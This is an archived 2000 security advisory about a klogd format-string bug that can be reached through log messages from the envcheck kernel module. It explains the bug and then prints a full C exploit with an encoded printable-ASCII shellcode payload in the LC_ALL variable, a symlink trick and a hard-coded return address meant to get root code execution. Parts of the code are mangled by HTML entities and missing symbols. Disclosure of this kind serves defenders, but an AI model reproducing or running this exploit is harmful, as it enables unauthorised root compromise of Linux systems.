Klogd Exploit Using Envcheck

2000-09-26T00:00:00
ID SECURITYVULNS:DOC:713
Type securityvulns
Reporter Securityvulns
Modified 2000-09-26T00:00:00

Description

-----BEGIN PGP SIGNED MESSAGE-----

               Klogd Exploit Using Envcheck
                  Release Date: 20000925

Envcheck (http://home.cern.ch/cons/security/) is a Linux/x86 kernel module which strips dangerous environment variables before executing a new program, and which can be used to log these probably threatening events. It was mentioned on this list two weeks ago. However, a recent format string handling bug in klogd allows an attacker to overflow its buffer and execute arbitrary code. The problem from attacker's viewpoint is that usual kernel messages contain so few attacker-controlled characters that exploiting it might not be possible at all or is kernel specific.

Snipped from envcheck.c (wrapped): if (strchr(&string1[env_lang_len[j]], '/')) { if (verbose) { sanitise(string1); printk(KERN_INFO "envcheck: %.30s (uid=%d) discarded locale variable with /: %s\n", current->comm, current->uid, string1);

Verbose is enabled by default. String1 can be 64 characters. Sanitise() filters non-printable ASCII characters (<0x20 and >0x7e). Custom shell code has to be made, for which our favourite insecurity architecture is suitable so well.

Return address has to contain other characters so program's filename will be used. It is limited to 15 characters but it is enough for a format string which overflows the 2048 byte buffer in klogd's vsyslog() and overwrites the return address. In a successful attack/DoS uid will not be even logged due to long format padding.

New version of envcheck has been released which does extra filtering. In this particular case it does not necessarily help, because envcheck can be used to inject the shellcode into klogd's stack, and another shorter kernel message can be used to trigger the payload.

I think this is a nice example of security failure. Klogd should not run as root on 2.2+ kernels anyway.

/ * Linux/x86 klogd exploit using envcheck by * Esa Etelavuori (www.iki.fi/ee/) in 2k0912 * Tested on Red Hat 6.2 / Celeron A & P2. * You need some skillz to use this. /

include <stdio.h>

include <stdlib.h>

include <unistd.h>

define RETADDR 0xbffffdab

int main(int ac, char av) { char sting[] = "./[<%2009xAAAABBB"; / Self-modifying code using 0x20 - 0x7e chars and execing /tmp/x. * May need tuning for correct %esp offset (%ebx) for modification * of last two bytes which are transformed into int 0x80. / char *venom = "LC_ALL=" "T[fhBOfXf5B@f1ChjAX4APPZHf1Chfh/xh/tmpT[RSTYjOX4D2p";

if &#40;ac != 1 &amp;&amp; ac != 2&#41; {
    fprintf&#40;stderr, &quot;usage: &#37;s [return address]&#92;n&quot;, av[0]&#41;;
    exit&#40;1&#41;;
}

if &#40;ac == 2 &amp;&amp; av[1][0] == &#39;-&#39;&#41; {
    printf&#40;&quot;done&#92;n&quot;&#41;;
    exit&#40;0&#41;;
}
else if &#40;ac == 2 &amp;&amp; av[1][0] == &#39;+&#39;&#41; {
    if &#40;putenv&#40;venom&#41;&#41; {
        perror&#40;&quot;putenv&quot;&#41;;
        exit&#40;1&#41;;
    }
    execl&#40;av[0], av[0], &quot;-&quot;, NULL&#41;;
}
else {
    *&#40;unsigned long *&#41;&#40;&amp;sting[strlen&#40;sting&#41; - 4 - 3]&#41;
        = ac == 1 ? RETADDR: strtoul&#40;av[1], NULL, 0&#41;;
    if &#40;symlink&#40;av[0], sting&#41;&#41; {
        perror&#40;&quot;symlink&quot;&#41;;
        exit&#40;1&#41;;
    }
    execl&#40;sting, sting, &quot;+&quot;, NULL&#41;;
}

perror&#40;&quot;execl&quot;&#41;;
exit&#40;1&#41;;

}

-----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use Charset: noconv

iQCVAwUBOc9cCVZDrCkIweM9AQFxEwP+Mmy78QkvOqdgRipndjSofapfYlOSVJTU Up9RKgrA6d475l8EV3HhzMB/fbKo6yyQ5XZ3yy+Bk37AzBnK79titPgK8VFbTFmn 826nmT8W6F4GrPIrvACxAno2iL+vm2DPdzivWSDxIg2r1ZBCddyJPokdVms+Hpwh Iyg4VvqbUMA= =RqCF -----END PGP SIGNATURE-----